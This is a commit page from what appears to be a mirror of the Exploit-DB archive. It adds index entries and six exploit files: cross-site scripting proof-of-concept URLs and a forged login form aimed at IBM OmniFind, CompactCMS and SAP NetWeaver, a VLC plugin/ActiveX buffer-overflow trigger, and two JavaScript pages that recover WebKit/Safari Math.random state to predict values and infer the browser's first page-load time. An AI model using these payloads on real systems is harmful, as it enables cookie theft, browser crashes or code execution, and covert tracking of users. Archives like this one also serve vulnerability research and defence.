bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_21_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-21 04:45:08 +00:00
parent 1d0bcd6fa4
commit 195bc38235
7 changed files with 337 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -31515,3 +31515,9 @@ id,file,description,date,author,platform,type,port
34998,platforms/linux/remote/34998.txt,"Eclipse <= 3.6.1 Help Server help/index.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0
34999,platforms/linux/remote/34999.txt,"Eclipse <= 3.6.1 Help Server help/advanced/content.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0
35000,platforms/windows/dos/35000.txt,"SAP Netweaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200
35001,platforms/windows/remote/35001.txt,"SAP NetWeaver 7.0 SQL Monitor Multiple Cross Site Scripting Vulnerabilities",2010-11-17,a.polyakov,windows,remote,0
35002,platforms/windows/remote/35002.html,"VLC Media Player 1.1.x Calling Convention Remote Buffer Overflow Vulnerability",2010-11-02,shinnai,windows,remote,0
35003,platforms/multiple/remote/35003.txt,"IBM OmniFind 'command' Parameter Cross Site Scripting Vulnerability",2010-11-09,"Fatih Kilic",multiple,remote,0
35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2010-11-18,"High-Tech Bridge SA",php,webapps,0
35005,platforms/windows/remote/35005.html,"WebKit Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0
35006,platforms/windows/remote/35006.html,"WebKit Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0

Can't render this file because it is too large.

11
platforms/multiple/remote/35003.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/44940/info
IBM OmniFind is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
IBM OmniFind versions 8.5 and 9.0 are affected; other versions may also be vulnerable.
NOTE: This issue was previously covered in BID 44740 (IBM OmniFind Multiple Vulnerabilities) but has been given its own record to better document it.
http://www.example.com/ESAdmin/collection.do?command=<script>alert(document.cookie);</script>

14
platforms/php/webapps/35004.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/44949/info
CompactCMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
CompactCMS 1.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/?a="><script>alert("XSS");</script>
<form action="http://www.example.com/lib/includes/auth.inc.php" method="post" name="main" >
<input type="hidden" name="userName" value="123&#34;><script>alert(&#34;XSS&#34;);</script>" />
<input type="hidden" name="userPass" value="123" />
<input type="submit" value="Submit" name="submit" />
</form>

12
platforms/windows/remote/35001.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/44904/info
The SQL Monitor of SAP NetWeaver is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com:50100/OpenSQLMonitors/servlet/ConnectionMonitorServlet?view=stmtpool&node=12924950&ds=SAPSR3DB&connid
=com.sap.sql.jdbc.direct.DirectPooledConnection@1ed00a7<script>alert(document.cookie)</script>
http://www.example.com:50100/OpenSQLMonitors/servlet/CatalogBufferMonitorServlet?action=btnSHOW_COLUMNS&reqNode=12924950&reqBufferId=
SAPSERVER:dm0:SAPSR3DB&reqTableColumns=BC_RPROF_PROFILE<script>alert(document.cookie)</script>

94
platforms/windows/remote/35002.html Executable file
View file

@ -0,0 +1,94 @@
source: http://www.securityfocus.com/bid/44909/info
VLC Media Player is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
Versions prior to VLC Media Player 1.1.5 for Windows are vulnerable.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
========================================================================================================================
========================================================================================================================
VLC Multimedia Plug-in and/or Activex 1.1.4 MRL handler remote buffer overflow
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Note that the activex {9BE31822-FDAD-461B-AD51-BE1D1C159921} is marked as follow:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
***
Note that the activex {E23FE9C6-778E-49D4-B537-38FCDE4887D8} is marked as follow:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Tested on:
Windows 7 professional full patched against Firefox 3.6.11
Windows 7 professional full patched against Internet Explorer 8
========================================================================================================================
========================================================================================================================
Plug-in Version:
<html>
<embed type="application/x-vlc-plugin" MRL="smb://Something.com@www.Something.com/#{aaaaaaaaaaaaaaaaaaaaaa}"></embed>
</html>
========================================================================================================================
========================================================================================================================
Activex {9BE31822-FDAD-461B-AD51-BE1D1C159921} version:
<html>
<object classid='clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921' id='test'></object>
<script language = 'vbscript'>
buff = String(500, "A")
test.MRL = "smb://Something.com@www.Something.com/#{" & buff & "}"
</script>
</html>
========================================================================================================================
========================================================================================================================
Activex {E23FE9C6-778E-49D4-B537-38FCDE4887D8} version:
<html>
<object classid='clsid:E23FE9C6-778E-49D4-B537-38FCDE4887D8' id='test'></object>
<script language = 'vbscript'>
buff = String(500, "A")
test.MRL = "smb://Something.com@www.Something.com/#{" & buff & "}"
</script>
</html>
========================================================================================================================
========================================================================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
iQIcBAEBAgAGBQJMxpYiAAoJELleC2c7YdP1asMQALE8uuLZovZA9S7d2uwRJp3d
SrvQgKggqyQZ1z7ymDOzo74EGwHJVfSs/ix/xvE5lkYqlY31bEbsjHtqGRsKr0I0
x12GGdW7JTxCiq/Fw2zLpjzE3xNpOwaFs+OR3BWuw1G6e9r1jooqlnN5mSTBEVlp
2y113XK2mo85S5cEYDTTm/YFHqrMF1Jy21eXLRfHs+13E2FPGM8viyCacTf02W8P
4VF2s4vVDC5mreqX/Rlts7roouHCZLJRaoFMyl5xcgv+BqGSOGIe9dLcUz18wwtJ
c8i1+ZGTbYmdfOAL8Kkexy96/lWfeewJBiA8s12qkzrm7xtjdpyt+cJdCelThEQP
/RVHLBmh7n03CzgCHG06DKfPnBtPgQquqFtMrYOsSZPJDNwGQEg1orZgcfpe9yVi
8LWbrKpAe0ay8gCF2o//wdJ6ht8Uuqn1LuXShVgPU1kBrQaNw7k+x6y0Xd0PxW3m
rFQQjsOzlrTbtw7SDCaPxxCwgIBWr4bekmfcIE4xiTBIVKAhT4AbfBG5H4zxTMpv
g5CJ6qifs3Zfb1sgQb6KKT+7j+4zZIcm0AA3L/8DjESYId8WiI/26eDn2/pX8hx0
p5JxomSSkLHoO/alMUw4mR+4Rz9YhIuPZz7t6DiV21xn+xgBavRdT2Ztc9jA7yP1
QBQRi/NSST3Gxu5ZaJXx
=2VZk
-----END PGP SIGNATURE-----

143
platforms/windows/remote/35005.html Executable file
View file

@ -0,0 +1,143 @@
source: http://www.securityfocus.com/bid/44952/info
WebKit is prone to a random-number-generator weakness.
Attackers can exploit this issue by enticing an unsuspecting user into visiting a malicious webpage.
Successful attacks will allow attackers to track user sessions and obtain personal information that can aid in further attacks.
NOTE: This issue was previously covered in BID 44938 (Apple Safari Prior to 5.0.3 and 4.1.3 Multiple Security Vulnerabilities) but has been given its own record to better document it.
<html>
<body>
<script>
document.write("Browser: "+navigator.userAgent);
</script>
<br>
<br>
<script>
interval=200;
iid=null;
function setint()
{
interval=document.getElementById('x').value;
clearInterval(iid);
iid=setInterval("recalc()",interval);
return;
}
</script>
<form>
Polling interval:<br>
Use low values (e.g. 200) for PRNG state mark demo and reseed
counting<br>
Use high values (e.g. 5000) for PRNG prediction demo<br>
<input type="text" id="x" value="200"><br>
<input type="button" value="Change" onClick="setint();">
</form>
Total MSVCRT PRNG invocations (since this page load):
<div id="total"></div><br>
MSVCRT PRNG invocations since last reseed:
<div id="current"></div><br>
MSVCRT PRNG reseed count (since this page load):
<div id="reseed"></div><br>
MSVCRT PRNG state mark:
<div id="mark"></div><br>
Current Math.random():
<div id="math_random"></div><br>
Calculated next Math.random() values:
<div id="next"></div><br>
<script>
var total_counter=0;
var current_counter=0;
var reseed_counter=0;
var state=0;
var mark=0;
function adv(x)
{
return (214013*x+2531011) & 0x7FFFFFFF;
}
function update_counters(reseed)
{
document.getElementById("total").innerText=total_counter;
document.getElementById("current").innerText=current_counter;
document.getElementById("reseed").innerText=reseed_counter;
document.getElementById("mark").innerText=mark;
m=Math.random();
state=adv(state);
state2=adv(state);
state2=adv(state2);
document.getElementById("math_random").innerText=m;
document.getElementById("next").innerText=
((((adv(state2)>>16)&0x7FFF)<<15)|((state2>>16)&0x7FFF))/(1<<30
);
state2=adv(state2);
state2=adv(state2);
document.getElementById("next").innerText+=" "+
((((adv(state2)>>16)&0x7FFF)<<15)|((state2>>16)&0x7FFF))/(1<<30
);
}
function find_mark(st)
{
for (;;)
{
if ((st & 0x3FF)==0)
{
return st>>10;
}
st=adv(st);
}
}
function recalc()
{
var rr=new Array();
rr[0]=Math.random()*Math.pow(2,30);
// Try to resync with the PRNG.
// Allow up to 1000 iterations from previous sync
for (k=0;k<1000;k++)
{
state=adv(state);
if ((((state>>16)&0x7FFF)==(rr[0]&0x7FFF)) &&
(((adv(state)>>16)&0x7FFF)==(rr[0]>>15)))
{
state=adv(state);
total_counter+=k;
current_counter+=k;
mark=find_mark(state);
update_counters(false);
return;
}
}
rr[1]=Math.random()*Math.pow(2,30);
var r=new Array();
for (i=0;i<2;i++)
{
r.push(rr[i] & 0x7FFF);
r.push(rr[i]>>15);
}
for (v=0;v<(1<<16);v++)
{
state=(r[0]<<16)|v;
for (j=1;j<4;j++)
{
state=adv(state);
if (((state>>16)&0x7FFF)!=r[j])
{
break;
}
}
if (j==4)
{
reseed_counter++;
current_counter=0;
mark=find_mark(state);
update_counters(true);
return;
}
}
}
recalc();
setint();
</script>
</body>
</html>

57
platforms/windows/remote/35006.html Executable file
View file

@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/44952/info
WebKit is prone to a random-number-generator weakness.
Attackers can exploit this issue by enticing an unsuspecting user into visiting a malicious webpage.
Successful attacks will allow attackers to track user sessions and obtain personal information that can aid in further attacks.
NOTE: This issue was previously covered in BID 44938 (Apple Safari Prior to 5.0.3 and 4.1.3 Multiple Security Vulnerabilities) but has been given its own record to better document it.
<html>
<body>
<script>
document.write("userAgent: "+navigator.userAgent);
</script>
<br>
<br>
<div id="foo"></div>
<form>
<input type="button"
value="Calculate Safari 5.0 (Windows) PRNG seed and mileage"
onClick="calc_seed()">
</form>
<script>
function calc_seed()
{
r1=Math.random()*Math.pow(2,32);
r2=Math.random()*Math.pow(2,32);
H=r1;
L=(r2-(((H & 0xFFFF0000)>>>16) | ((H & 0x0000FFFF)<<16)))
& 0xFFFFFFFF;
// 10000 is just an arbitrary limit to make sure the
// algorithm doesn't run into an endless loop on
// non-vulnerable browsers
for (k=0;k<10000;k++)
{
L=(L-H) & 0xFFFFFFFF;
H=(H-L) & 0xFFFFFFFF;
H=((H & 0xFFFF0000)>>>16) | ((H & 0x0000FFFF)<<16);
if ((H^L)==0x49616E42)
{
document.getElementById("foo").innerText=
"PRNG Seed: "+H+" "+
"(First page rendered: "+
(new Date(H*1000)).toString()+")\n"+
"PRNG mileage: "+k;
return;
}
}
document.getElementById("foo").innerText=
"Could not find seed\n"+
"Are you sure it's Safari 5.0 for Windows?";
return;
}
</script>
</body>
</html>